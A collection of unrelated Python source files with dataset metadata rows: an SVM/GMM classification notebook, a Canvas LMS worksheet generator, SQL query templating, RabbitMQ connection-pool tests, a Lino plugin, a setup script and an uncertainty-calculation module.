test_scores.append(GMMs[c].score_samples(X_test))
train_scores = np.asarray(train_scores).T
test_scores = np.asarray(test_scores).T
# In[ ]:
print ('train_scores.shape : {}'.format(train_scores.shape))
# find the index of the highest-scoring model
# In[ ]:
y_pred_GMM_train = np.argmax(train_scores, axis=1)
y_pred_GMM_test = np.argmax(test_scores, axis=1)
# In[ ]:
print ('(GMM)train acc : %f'% accuracy_score(y_train, y_pred_GMM_train))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test))
print ('(GMM)confusion matrix : ')
print (confusion_matrix(y_test, y_pred_GMM_test))
# ### Effect of Standardization
# In[ ]:
ss = StandardScaler()
ss.fit(X_train)
X_st_train = ss.transform(X_train)
X_st_test = ss.transform(X_test)
# ##### SVM
# In[ ]:
linearSVM = svm.LinearSVC(C=.1, max_iter=100)
linearSVM.fit(X_st_train, y_train)
y_pred_SVM_train = linearSVM.predict(X_st_train)
y_pred_SVM_st = linearSVM.predict(X_st_test)
print ('(SVM)train acc : %f'% accuracy_score(y_train, y_pred_SVM_train))
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM_st))
print (confusion_matrix(y_test, y_pred_SVM_st))
# ##### GMM
# In[ ]:
unique_class = range(10) # array of GMM for each class
GMMs = dict()
for c in unique_class :
GMMs[c] = GaussianMixture(n_components=32, covariance_type='full',
tol = 0.05, reg_covar=3)
index_gmm = np.where(y_train==c)[0]
GMMs[c].fit(X_st_train[index_gmm])
# scoring X using GMM
train_scores = list()
test_scores = list()
for c in unique_class :
train_scores.append(GMMs[c].score_samples(X_st_train))
test_scores.append(GMMs[c].score_samples(X_st_test))
# find the model with the best score
train_scores = np.asarray(train_scores).T
test_scores = np.asarray(test_scores).T
y_pred_GMM_train = np.argmax(train_scores, axis=1)
y_pred_GMM_test_st = np.argmax(test_scores, axis=1)
print ('(GMM)train acc : %f'% accuracy_score(y_train, y_pred_GMM_train))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test_st))
print ('(GMM)confusion matrix')
print (confusion_matrix(y_test, y_pred_GMM_test))
# ### Results
# In[ ]:
print ('baseline')
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test))
print ('Standardization')
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM_st))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test_st))
| 22.411483 | 86 | 0.6962 | 757 | 4,684 | 4.056803 | 0.198151 | 0.039075 | 0.03126 | 0.066428 | 0.593618 | 0.579941 | 0.54803 | 0.509606 | 0.498209 | 0.458157 | 0 | 0.015431 | 0.156063 | 4,684 | 208 | 87 | 22.519231 | 0.761447 | 0.166524 | 0 | 0.45977 | 0 | 0 | 0.116675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.091954 | 0 | 0.091954 | 0.287356 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
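# --- Usage sketch (not from the original notebook) ---
# How 120-dim vectors like X above are typically built: 20 MFCCs plus
# their delta and double-delta (60 per-frame features), summarised by
# mean and std over time. The librosa pipeline below is an assumption
# about the preprocessing, shown for illustration only.
# import librosa
# import numpy as np
#
# y_audio, sr = librosa.load('blues.00000.wav')  # hypothetical clip
# mfcc = librosa.feature.mfcc(y=y_audio, sr=sr, n_mfcc=20)
# d1 = librosa.feature.delta(mfcc)
# d2 = librosa.feature.delta(mfcc, order=2)
# feats = np.vstack([mfcc, d1, d2])                        # shape (60, n_frames)
# x = np.hstack([feats.mean(axis=1), feats.std(axis=1)])   # shape (120,)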
e2e880113fa2ff93a3ecc07d1b229e383a3a5b72 | 6,023 | py | Python | assignments/assignment_clo_worksheet.py | dgrobani/py3_canvaslmi_api | c02c56a33dd196bdf779039c13bb52aa1e88699d | [
"MIT"
] | 18 | 2017-07-20T20:20:39.000Z | 2021-09-26T20:16:58.000Z | assignments/assignment_clo_worksheet.py | dgrobani/py3_canvaslmi_api | c02c56a33dd196bdf779039c13bb52aa1e88699d | [
"MIT"
] | null | null | null | assignments/assignment_clo_worksheet.py | dgrobani/py3_canvaslmi_api | c02c56a33dd196bdf779039c13bb52aa1e88699d | [
"MIT"
] | 3 | 2018-05-17T12:07:36.000Z | 2021-12-22T23:17:18.000Z | # https://openpyxl.readthedocs.io/
# https://automatetheboringstuff.com/chapter12/
# https://www.ablebits.com/office-addins-blog/2014/09/24/excel-drop-down-list/
# http://stackoverflow.com/questions/18595686/how-does-operator-itemgetter-and-sort-work-in-python
from canvas.core.courses import get_course_by_sis_id, validate_course
from canvas.core.io import get_cmi_clos_by_course, tada
from openpyxl import load_workbook
from openpyxl.formatting.rule import CellIsRule
from openpyxl.styles import Alignment, Font, colors, PatternFill
from openpyxl.styles.borders import Border, Side
from openpyxl.utils import get_column_letter
from openpyxl.worksheet.datavalidation import DataValidation
from canvas.core.assignments import get_assignments
def assignment_clo_worksheet():
courses = {
'2016-2SU-01-NDNP-714-LEC-ONL-O1': ['Paulina', 'Van'],
'2016SS-OAK-UGAOAK1-NURSG-160-LEC1-1': ['Paulina', 'Van', 'NABSN'],
'2016-3FA-02-NABSN-170-LEC-SFP-01': ['Jenny', 'Zettler Rhodes'],
'2016-3FA-01-NBSN-164-LEC-OAK-01': ['Erik', 'Carter'],
'2016-3FA-01-NELMSN-566-LEC-SAC-01': ['Erik', 'Carter'],
'2016-3FA-01-NBSN-108-LEC-OAK-01': ['Christine', 'Rey']
}
for course_sis_id in courses:
template_file = load_workbook('assignment_clo_worksheet.xlsx')
sheet = template_file.get_sheet_by_name(template_file.active.title)
sheet.freeze_panes = 'B1'
sheet.page_setup.fitToHeight = 1
border = Border(left=Side(style='thin'), right=Side(style='thin'),
top=Side(style='thin'), bottom=Side(style='thin'))
sixteen_point = Font(size=16)
dv = DataValidation(type="list", formula1='"Yes,No"', allow_blank=False)
sheet.add_data_validation(dv)
teacher_firstname = courses[course_sis_id][0]
teacher_lastname = courses[course_sis_id][1]
course = get_course_by_sis_id(course_sis_id)
course_sis_info = validate_course(course)
program, number, ctype, campus, section, term, session = \
[course_sis_info[i] for i in ['program', 'number', 'type', 'campus', 'section', 'term', 'session']]
filename = '{}-{}-{}-{}-{}-{}-{}-{}.xlsx'\
.format(program, number, ctype, campus, section, term, session, teacher_lastname)
# header
sheet.cell(row=1, column=1).value = number
sheet.cell(row=2, column=1).value = course_sis_id
sheet.cell(row=3, column=1).value = course['name']
sheet.cell(row=1, column=2).value = term
sheet.cell(row=2, column=2).value = teacher_firstname + ' ' + teacher_lastname
# assignments (graded only)
assignments = get_assignments(course['id'])
for row, assignment in enumerate(sorted(assignments, key=lambda a: "" if not a['due_at'] else a['due_at'])):
if 'not_graded' in assignment['submission_types'] or not assignment['points_possible'] \
or ('omit_from_final_grade' in assignment and assignment['omit_from_final_grade']):
continue
sheet.cell(row=7+row, column=1).value = assignment['name']
sheet.cell(row=7+row, column=1).hyperlink = assignment['html_url']
sheet.cell(row=7+row, column=1).border = border
sheet.cell(row=7+row, column=1).font = sixteen_point
sheet.cell(row=7+row, column=1).font = Font(color=colors.BLUE)
sheet.row_dimensions[7+row].height = 27
# rubric yes/no
sheet.cell(row=7+row, column=2).border = border
sheet.cell(row=7+row, column=2).font = sixteen_point
dv.add(sheet.cell(row=7+row, column=2))
# improvement plan
sheet.cell(row=7+row, column=3).border = border
# plan complete yes/no
sheet.cell(row=7+row, column=4).border = border
sheet.cell(row=7+row, column=4).font = sixteen_point
dv.add(sheet.cell(row=7+row, column=4))
# clos
max_clo_desc_len = 0
# kludge for old sis id format
program = program if len(courses[course_sis_id]) == 2 else courses[course_sis_id][2]
clos = get_cmi_clos_by_course(program, course_sis_info['number'])
for col, clo in enumerate(clos):
sheet.cell(row=6, column=5+col).alignment = Alignment(vertical='top', wrapText=True)
sheet.cell(row=6, column=5+col).value = '{}: {}'.format(clo['clo_title'], clo['clo_description'])
sheet.cell(row=6, column=5+col).border = border
sheet.cell(row=6, column=5+col).font = sixteen_point
max_clo_desc_len = max(len(clo['clo_description']), max_clo_desc_len)
# clo headers [styling merged cells doesn't work in openpyxl]
last_column = 4 + len(clos)
sheet.merge_cells(start_row=4, start_column=5, end_row=4, end_column=last_column)
sheet.merge_cells(start_row=5, start_column=5, end_row=5, end_column=last_column)
# clo column width & row height
sheet.row_dimensions[6].height = max_clo_desc_len / 50 * 36
for column in range(5, last_column + 1):
sheet.column_dimensions[get_column_letter(column)].width = 50
# conditional formatting for x marks the spot
clo_range = 'E7:{}{}'.format(get_column_letter(last_column), 6 + len(assignments))
sheet.conditional_formatting\
.add(clo_range, CellIsRule(operator='greaterThan', formula=['""'], fill=PatternFill(bgColor='70AD47')))
for row in range(7, 7 + len(assignments)):
for column in range(5, last_column + 1):
sheet.cell(row=row, column=column).border = border
sheet.cell(row=row, column=column).alignment = Alignment(horizontal="center", vertical="center")
template_file.save(filename)
if __name__ == '__main__':
assignment_clo_worksheet()
tada()
| 48.96748 | 117 | 0.636062 | 802 | 6,023 | 4.610973 | 0.293017 | 0.055976 | 0.074635 | 0.042185 | 0.268253 | 0.190373 | 0.159816 | 0.091942 | 0.041103 | 0.023256 | 0 | 0.036176 | 0.228956 | 6,023 | 122 | 118 | 49.368852 | 0.760121 | 0.083845 | 0 | 0.023529 | 0 | 0 | 0.113548 | 0.054265 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011765 | false | 0 | 0.105882 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ead67c7bdbd412472810f4cfc5c65925b61e24 | 3,949 | py | Python | curiefense/curielogserver/curielogserver/ratelimitrecommendation.py | fossabot/curiefense | 6941f8aa08bcac1b0cf87c36ddb0037917a38c5a | [
"Apache-2.0"
] | 1 | 2020-11-15T06:27:05.000Z | 2020-11-15T06:27:05.000Z | curiefense/curielogserver/curielogserver/ratelimitrecommendation.py | fossabot/curiefense | 6941f8aa08bcac1b0cf87c36ddb0037917a38c5a | [
"Apache-2.0"
] | 3 | 2022-02-24T09:58:32.000Z | 2022-03-01T20:05:07.000Z | curiefense/curielogserver/curielogserver/ratelimitrecommendation.py | xavier-rbz/curiefense | 44200a90c515fe184e9c66ea662b2643adcbd34e | [
"Apache-2.0"
] | 1 | 2021-01-07T20:51:48.000Z | 2021-01-07T20:51:48.000Z | import yaml
class FeatureAnalysis(object):
def __init__(self, **kwargs):
self.input_params = {}
self.yaml_data = None
self.input_params.update(kwargs)
self.yaml_data = self._load_yaml()
def _load_yaml(self):
'''
        Read the yaml template from the path given by the
        'yaml_file_name' input parameter
        return parsed yaml template
'''
full_path = self.input_params['yaml_file_name']
try:
with open(full_path, 'r') as reader:
yaml_content = reader.read()
return yaml.load(yaml_content,Loader=yaml.FullLoader)
except Exception as error:
print('failed loading yaml file {0}'.format(error))
def _validate_input_params(self):
for param in self.yaml_data['input_params']:
name = param['name']
_type = param['type']
# a) validate param provided
if name not in self.input_params:
print('input param name {name} is missing'.format(name=name))
return False
# b) validate param data type
input_type = type(self.input_params[name]).__name__
if input_type != _type:
print('input param name {name} type mismatch got {_type} while expecting {yaml_type}'.format(
name=name, _type=input_type, yaml_type=_type))
return False
return True
def construct_sql(self):
'''
        This function completes the sql template with the input parameters
'''
valid_input = self._validate_input_params()
if valid_input:
sql_template = self.yaml_data['sql_template']
if sql_template:
try:
return sql_template.format(**self.input_params)
                except Exception as error:
                    print('failed formatting sql_template from yaml data: {0}'.format(error))
return None
return None
return None
print('failed loading sql_template from yaml data')
def _run_feature(self):
sql = self.construct_sql()
return sql
def run(self):
return self._run_feature()
class RateLimitLocation(FeatureAnalysis):
def __init__(self, **kwargs):
FeatureAnalysis.__init__(self, **kwargs)
key_composition = self.input_params["key_composition"]
include = self.input_params["include"]
exclude = self.input_params["exclude"]
self.input_params["gen_key_composition"] = self._gen_key_composition(key_composition)
self.input_params["gen_include"] = self._gen_include(include)
self.input_params["gen_exclude"] = self._gen_exclude(exclude)
def _gen_key_composition (self,item):
lines = []
def comma2arrow(item):
return "->".join(item[0:-1]) + "->>" + item[-1]
keys = list(map(comma2arrow, item))
def construct_key_composition():
for key in keys:
lines.append("(curiefense->{key})".format(key=key))
return "concat(" + " , ".join(lines) + ")"
key_composition_sql = construct_key_composition()
return key_composition_sql
def _gen_include (self,include_param):
lines = []
def comma2arrow(include_param):
return "->".join(include_param[0:-1]) + "->>" + include_param[-1]
keys = list(map(comma2arrow, include_param))
def construct_include():
for key in keys:
lines.append(" AND (curiefense->{key})".format(key=key))
return " ".join(lines)
return construct_include()
def _gen_exclude (self,exclude_param):
lines = []
def comma2arrow(exclude_param):
return "->".join(exclude_param[0:-1]) + "->>" + exclude_param[-1]
keys = list(map(comma2arrow, exclude_param))
def construct_exclude():
for key in keys:
lines.append(" AND NOT (curiefense->{key})".format(key=key))
return " ".join(lines)
return construct_exclude()
def rate_limit_recommend(input_args):
rate_limloc = RateLimitLocation(**input_args)
result = rate_limloc.run()
return result
| 30.612403 | 109 | 0.627247 | 468 | 3,949 | 5.029915 | 0.198718 | 0.070093 | 0.076466 | 0.02294 | 0.18904 | 0.115548 | 0.068819 | 0.046729 | 0.046729 | 0.046729 | 0 | 0.005464 | 0.258546 | 3,949 | 129 | 110 | 30.612403 | 0.798497 | 0.045075 | 0 | 0.186813 | 0 | 0 | 0.119202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.186813 | false | 0.010989 | 0.010989 | 0.043956 | 0.43956 | 0.054945 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
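# --- Usage sketch (not from the original module) ---
# Example input for rate_limit_recommend(); the yaml file name and the
# quoted JSON key paths are hypothetical and depend on the deployed
# template (comma2arrow joins them with Postgres '->'/'->>' operators).
# input_args = {
#     'yaml_file_name': 'ratelimit_template.yaml',
#     'key_composition': [["'request'", "'headers'", "'x-forwarded-for'"]],
#     'include': [["'request'", "'attributes'", "'secure'"]],
#     'exclude': [["'request'", "'attributes'", "'internal'"]],
# }
# sql = rate_limit_recommend(input_args)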
e2eca23998b33c6bcec131356180963aa665068c | 7,359 | py | Python | tests/test_pool.py | 5uper5hoot/PikaExamples | 9d3ae7918343ed612c253bf410882575033c80d6 | [
"MIT"
] | null | null | null | tests/test_pool.py | 5uper5hoot/PikaExamples | 9d3ae7918343ed612c253bf410882575033c80d6 | [
"MIT"
] | 17 | 2019-01-13T00:18:25.000Z | 2020-03-31T01:18:32.000Z | tests/test_pool.py | 5uper5hoot/PikaExamples | 9d3ae7918343ed612c253bf410882575033c80d6 | [
"MIT"
] | null | null | null | """
***********************************************************************
This code has been sourced from
https://github.com/bninja/pika-pool/blob/master/pika_pool.py
Governed by the following BSD licence sourced from
https://github.com/bninja/pika-pool/blob/master/LICENSE. No copyright
notice is available.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
(1) Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
(2) Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
(3) The name of the author may not be used to
endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
***********************************************************************
"""
from __future__ import unicode_literals
import json
import threading
import time
import uuid
import pika
import pytest
import pikatools.pool as pika_pool
@pytest.fixture(scope="session")
def params():
return pika.URLParameters("amqp://guest:guest@localhost:5672/")
@pytest.fixture(scope="session", autouse=True)
def schema(request, params):
cxn = pika.BlockingConnection(params)
channel = cxn.channel()
channel.queue_declare(queue="pika_pool_test")
consumed = {}
@pytest.fixture(scope="session", autouse=True)
def consume(params):
def _callback(ch, method, properties, body):
msg = Message.from_json(body)
consumed[msg.id] = msg
def _forever():
channel.start_consuming()
cxn = pika.BlockingConnection(params)
channel = cxn.channel()
channel.queue_declare(queue="pika_pool_test")
channel.basic_consume(_callback, queue="pika_pool_test", no_ack=True)
thd = threading.Thread(target=_forever)
thd.daemon = True
thd.start()
@pytest.fixture
def null_pool(params):
return pika_pool.NullPool(create=lambda: pika.BlockingConnection(params))
class Message(dict):
@classmethod
def generate(cls, **kwargs):
id = kwargs.pop("id", uuid.uuid4().hex)
return cls(id=id, **kwargs)
@property
def id(self):
return self["id"]
def to_json(self):
return json.dumps(self)
@classmethod
def from_json(cls, raw):
return cls(json.loads(raw.decode("utf-8")))
class TestNullPool(object):
def test_pub(self, null_pool):
msg = Message.generate()
with null_pool.acquire() as cxn:
cxn.channel.basic_publish(
exchange="", routing_key="pika_pool_test", body=msg.to_json()
)
time.sleep(0.1)
assert msg.id in consumed
@pytest.fixture
def queued_pool(params):
return pika_pool.QueuedPool(
create=lambda: pika.BlockingConnection(params),
recycle=10,
stale=10,
max_size=10,
max_overflow=10,
timeout=10,
)
@pytest.fixture
def empty_queued_pool(request, queued_pool):
queued = [queued_pool.acquire() for _ in range(queued_pool.max_size)]
request.addfinalizer(lambda: [cxn.release() for cxn in queued])
overflow = [queued_pool.acquire() for _ in range(queued_pool.max_overflow)]
request.addfinalizer(lambda: [cxn.release() for cxn in overflow])
return queued_pool
def test_use_it():
params = pika.URLParameters(
"amqp://guest:guest@localhost:5672/?"
"socket_timeout=10&"
"connection_attempts=2"
)
pool = pika_pool.QueuedPool(
create=lambda: pika.BlockingConnection(parameters=params),
max_size=10,
max_overflow=10,
timeout=10,
recycle=3600,
stale=45,
)
with pool.acquire() as cxn:
cxn.channel.basic_publish(
body=json.dumps(
{"type": "banana", "description": "they are yellow"}
),
exchange="",
routing_key="fruits",
properties=pika.BasicProperties(
content_type="application/json",
content_encoding="utf-8",
delivery_mode=2,
),
)
assert "cxn=localhost:5672//" in str(cxn.fairy)
class TestQueuedPool(object):
def test_invalidate_connection(self, queued_pool):
Message.generate()
with pytest.raises(pika.exceptions.AMQPConnectionError):
with queued_pool.acquire() as cxn:
fairy = cxn.fairy
raise pika.exceptions.AMQPConnectionError
assert fairy.cxn.is_closed
def test_pub(self, queued_pool):
msg = Message.generate()
with queued_pool.acquire() as cxn:
cxn.channel.basic_publish(
exchange="", routing_key="pika_pool_test", body=msg.to_json()
)
time.sleep(0.1)
assert msg.id in consumed
def test_expire(self, queued_pool):
assert queued_pool.recycle
with queued_pool.acquire() as cxn:
expired = id(cxn.fairy.cxn)
with queued_pool.acquire() as cxn:
assert expired == id(cxn.fairy.cxn)
cxn.fairy.created_at -= queued_pool.recycle + 1
with queued_pool.acquire() as cxn:
assert expired != id(cxn.fairy.cxn)
def test_stale(self, queued_pool):
with queued_pool.acquire() as cxn:
stale = id(cxn.fairy.cxn)
fairy = cxn.fairy
with queued_pool.acquire() as cxn:
assert stale == id(cxn.fairy.cxn)
fairy.released_at -= queued_pool.stale + 1
with queued_pool.acquire() as cxn:
assert stale != id(cxn.fairy.cxn)
def test_overflow(self, queued_pool):
queued = [queued_pool.acquire() for _ in range(queued_pool.max_size)]
with queued_pool.acquire() as cxn:
fairy = cxn.fairy
for cxn in queued:
cxn.release()
assert fairy.cxn.is_closed
def test_timeout(self, empty_queued_pool):
empty_queued_pool.timeout = 2
st = time.time()
with pytest.raises(pika_pool.Timeout):
empty_queued_pool.acquire()
elapsed = time.time() - st
assert elapsed < 2.5
def test_timeout_override(self, empty_queued_pool):
st = time.time()
with pytest.raises(pika_pool.Timeout):
empty_queued_pool.acquire(timeout=1)
elapsed = time.time() - st
assert elapsed < 1.5
| 31.314894 | 79 | 0.649409 | 923 | 7,359 | 5.052004 | 0.28494 | 0.07077 | 0.05104 | 0.037744 | 0.463864 | 0.424834 | 0.395239 | 0.324898 | 0.284581 | 0.250054 | 0 | 0.009991 | 0.238348 | 7,359 | 234 | 80 | 31.448718 | 0.821945 | 0.237261 | 0 | 0.346154 | 0 | 0 | 0.051918 | 0.016057 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.134615 | false | 0 | 0.051282 | 0.038462 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ed43d6c5005bae2644f44607ee1e0503afb323 | 702 | py | Python | lino_xl/lib/boards/__init__.py | khchine5/xl | b1634937a9ce87af1e948eb712b934b11f221d9d | [
"BSD-2-Clause"
] | 1 | 2018-01-12T14:09:48.000Z | 2018-01-12T14:09:48.000Z | lino_xl/lib/boards/__init__.py | khchine5/xl | b1634937a9ce87af1e948eb712b934b11f221d9d | [
"BSD-2-Clause"
] | 1 | 2019-09-10T05:03:47.000Z | 2019-09-10T05:03:47.000Z | lino_xl/lib/boards/__init__.py | khchine5/xl | b1634937a9ce87af1e948eb712b934b11f221d9d | [
"BSD-2-Clause"
] | null | null | null | # Copyright 2008-2015 Luc Saffre
#
# License: BSD (see file COPYING for details)
"""See :mod:`ml.boards`.
.. autosummary::
:toctree:
models
mixins
"""
from lino.api import ad, _
class Plugin(ad.Plugin):
"See :class:`lino.core.Plugin`."
verbose_name = _("Boards")
def setup_config_menu(config, site, user_type, m):
menu_host = site.plugins.contacts
m = m.add_menu(menu_host.app_label, menu_host.verbose_name)
m.add_action('boards.Boards')
def setup_explorer_menu(config, site, user_type, m):
menu_host = site.plugins.contacts
m = m.add_menu(menu_host.app_label, menu_host.verbose_name)
m.add_action('boards.Members')
| 21.272727 | 67 | 0.665242 | 99 | 702 | 4.484848 | 0.464646 | 0.108108 | 0.063063 | 0.081081 | 0.495496 | 0.495496 | 0.495496 | 0.495496 | 0.495496 | 0.495496 | 0 | 0.014388 | 0.207977 | 702 | 32 | 68 | 21.9375 | 0.784173 | 0.259259 | 0 | 0.333333 | 0 | 0 | 0.116667 | 0.048148 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ed6bd63b9ba47737b8f3f36b327226fa4cd188 | 1,628 | py | Python | setup.py | cfobel/go-posh | 29e387d823fcd148cf7020afdbe5b26a56293729 | [
"MIT"
] | null | null | null | setup.py | cfobel/go-posh | 29e387d823fcd148cf7020afdbe5b26a56293729 | [
"MIT"
] | null | null | null | setup.py | cfobel/go-posh | 29e387d823fcd148cf7020afdbe5b26a56293729 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2002-2008 ActiveState Software
# Author: Trent Mick (trentm@gmail.com)
"""Quick directory changing (super-cd)
'go' is a simple command line script to simplify jumping between
directories in the shell. You can create shortcut names for commonly
used directories and invoke 'go <shortcut>' to switch to that directory
-- among other little features.
"""
import os
import sys
from distutils.core import setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "lib"))
try:
import go
finally:
del sys.path[0]
classifiers = """\
Development Status :: 5 - Production/Stable
Environment :: Console
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2
Topic :: Software Development :: Libraries :: Python Modules
"""
if sys.version_info < (2, 3):
# Distutils before Python 2.3 doesn't accept classifiers.
_setup = setup
def setup(**kwargs):
if kwargs.has_key("classifiers"):
del kwargs["classifiers"]
_setup(**kwargs)
doclines = __doc__.split("\n")
setup(
name="go",
version=go.__version__,
maintainer="Trent Mick",
maintainer_email="trentm@gmail.com",
url="http://code.google.com/p/go-tool/",
license="http://www.opensource.org/licenses/mit-license.php",
platforms=["any"],
py_modules=["go"],
package_dir={"": "lib"},
description=doclines[0],
classifiers=filter(None, classifiers.split("\n")),
long_description="\n".join(doclines[2:]),
)
| 28.068966 | 72 | 0.668919 | 205 | 1,628 | 5.214634 | 0.643902 | 0.016838 | 0.026193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013783 | 0.197789 | 1,628 | 57 | 73 | 28.561404 | 0.804747 | 0.266585 | 0 | 0 | 0 | 0 | 0.374778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.105263 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2f3bc60879bf6291053573473efb8979f222e3a | 3,672 | py | Python | UforFunction.py | DezhengLee/Labster | 561c522d6d3d0b4b70c667d2f9a1d16e1734affc | [
"Apache-2.0"
] | 1 | 2021-09-27T14:26:20.000Z | 2021-09-27T14:26:20.000Z | UforFunction.py | DezhengLee/Labster | 561c522d6d3d0b4b70c667d2f9a1d16e1734affc | [
"Apache-2.0"
] | null | null | null | UforFunction.py | DezhengLee/Labster | 561c522d6d3d0b4b70c667d2f9a1d16e1734affc | [
"Apache-2.0"
] | null | null | null | from sympy import *
from sympy.abc import *
import functions as func
from decimal import *
def findAbsFuncU(function, U, variable, means, roundornot=True):
"""
Computes the absolute compound uncertainty U of the function via standard
propagation: U_f = sqrt(sum_i (df/dx_i)^2 * U_i^2).
:param function: (String) the formula
:param U: (Decimal dict, keys: variable names) ceiled uncertainties
:param variable: (char list) [x, y, z, ...]
:param means: (Decimal dict, keys: variable names) mean values
:param roundornot: (bool) round the result to significant digits if True
:return: (Decimal)
"""
resultListSquared = []
values = []
for k in variable:
values.append(float(means[str(k)]))
for k in variable:
tempfunc = lambdify(variable, diff(function, k), 'numpy')
tempvalue = tempfunc(*values)
resultListSquared.append((tempvalue**2) * float(U[str(k)]**2))
sumResult = Decimal(sum(resultListSquared))
result = sumResult.sqrt()
if roundornot:
resultString = result.to_eng_string()
intPart = resultString.split('.')[0]
try:  # may not have '.'
    decimalPart = resultString.split('.')[1]
    digiteff = 0
    if intPart == '0':
        while digiteff < len(decimalPart) and decimalPart[digiteff] == '0':
            digiteff += 1
        digiteff += 2
    else:
        digiteff = -len(intPart) + 2  # may not be true
except IndexError:
    digiteff = -len(intPart) + 2  # may not be true
return result.quantize(func.rounddigits(digiteff), ROUND_HALF_EVEN)
else:
return result
def findRelaFuncU(function, U, variable, means, roundornot=True):
"""
:param function: (String) the formula
:param U: (Decimal dic, keys: variable) ceiled
:param variable: (char list) [x,y,z,...]
:param means: (Decimal dic, keys: variable)
:return: (Decimal)
"""
lnfunction = 'ln(' + function + ')'
result = findAbsFuncU(lnfunction, U, variable, means, roundornot=roundornot)
return result
def findCompMean(function, variable, means):
"""
Computes the final compound mean, i.e. the function evaluated at the means of its variables, rounded to the appropriate significant digits.
:param function:(string)
:param variable:(list/set)
:param means: (Dic)
:return:
"""
values = [] # in float
for k in variable:
values.append(float(means[str(k)]))
tempfunc = lambdify(variable, function, 'numpy')
result = Decimal(tempfunc(*values))
efflist = []
for k in variable:
eff = func.eff(means[str(k)])
efflist.append(eff)
smallest = min(efflist)
dig = smallest
parts = result.to_eng_string().split('.')
intPart = parts[0]
DecimalPart = parts[1] if len(parts) > 1 else ''
if len(intPart) == 1 and intPart[0] == '0':
    i = 0
    while i < len(DecimalPart) and DecimalPart[i] == '0':
        i += 1
        dig += 1
else:
    dig = dig - len(intPart)
return result.quantize(func.rounddigits(dig + 1), ROUND_HALF_EVEN)
def findAbsFuncUFromRelaU(CompMean, ru):
"""
:param CompMean:
:param ru:
:return:
"""
result = CompMean * ru
resultString = result.to_eng_string()
intPart = resultString.split('.')[0]
try:  # may not have '.'
    decimalPart = resultString.split('.')[1]
    digiteff = 0
    if intPart == '0':
